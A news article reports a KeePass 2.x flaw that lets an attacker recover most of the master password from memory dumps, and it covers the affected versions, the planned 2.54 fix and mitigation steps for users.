KeePass password manager users may want to be extra vigilant over the next several weeks or so. The newly discovered vulnerability allows the master password to be retrieved in plain text, even when the database is locked or the program is closed. And while the fix is in progress, it won’t arrive until early June at the earliest.
As reported by Bleeping Computer (which covers the issue in full technical detail), a security researcher known as vdohney published a proof-of-concept tool that showed the exploit in action. An attacker can perform a memory dump to collect most master passwords in plain text, even when the KeePass database is closed, the program is locked, or the program is not open. When pulled from memory, the first one or two characters of the password will be lost, but they can be guessed to learn the entire string.
For those unfamiliar with memory dumping vulnerabilities, you can think of this scenario somewhat like the KeePass master password as loose change in your pants pocket. Shake the pants and you’ll have almost the entire dollar (so to speak) needed to buy entry to the database – but those coins shouldn’t be floating around in that pocket to begin with.
This proof-of-concept tool demonstrates this issue in Windows, but Linux and macOS are also believed to be at risk, as the problem is in KeePass, not the operating system. Standard user accounts in Windows aren’t secure either – a memory dump doesn’t require administrative privileges. To perform the exploit, the malicious actor would need either remote computer access (acquired through malware) or physical access.
All current versions of KeePass 2.x (eg, 2.53.1) are affected. Meanwhile, KeePass 1.x (an older version of the software is still in maintenance), KeePassXC, and Strongbox, which are other password managers compatible with KeePass database files, are not affected, according to vdohney.
This vulnerability will be fixed in version 2.54 of KeePass, which will likely be released in early June. Dominick Reichl, developer of KeePass, provided this estimate on the sourceforge forum along with the caveat that the time frame is not guaranteed. An unstable beta version of KeePass is now available with security mitigations. Bleeping Computer reports that the creator of the proof-of-concept exploit cannot reproduce the issue with the fixes applied.
However, even after upgrading to the stable version of KeePass, the master password may still be viewable in the program’s memory files. To fully protect against this, you will have to completely wipe your computer using a mode that overwrites existing data, and then freshly reinstall the operating system.
However, this is a very drastic step. Reasonably, do not allow untrusted individuals to access your computer, do not click on any unknown links or install any unknown software. A good antivirus program (such as one of our top recommendations) also helps. When you launch the stable version of KeePass, you can also change your master password after upgrading – doing so will make your previous password irrelevant if it’s still lurking in your memory files.
You can also reduce exposure by restarting your computer, clearing the hibernation and swap files, and temporarily accessing the KeePass database in a secure alternative like KeePassXC instead. Device encryption can also help against a physical attack on your computer (or if you think someone could mine this information after you donate or dispose of your computer). There are ways to stay protected – and fortunately, this appears to be just a proof-of-concept concern, not an active exploitation.
#exploit #reveal #KeePass #master #password #plain #text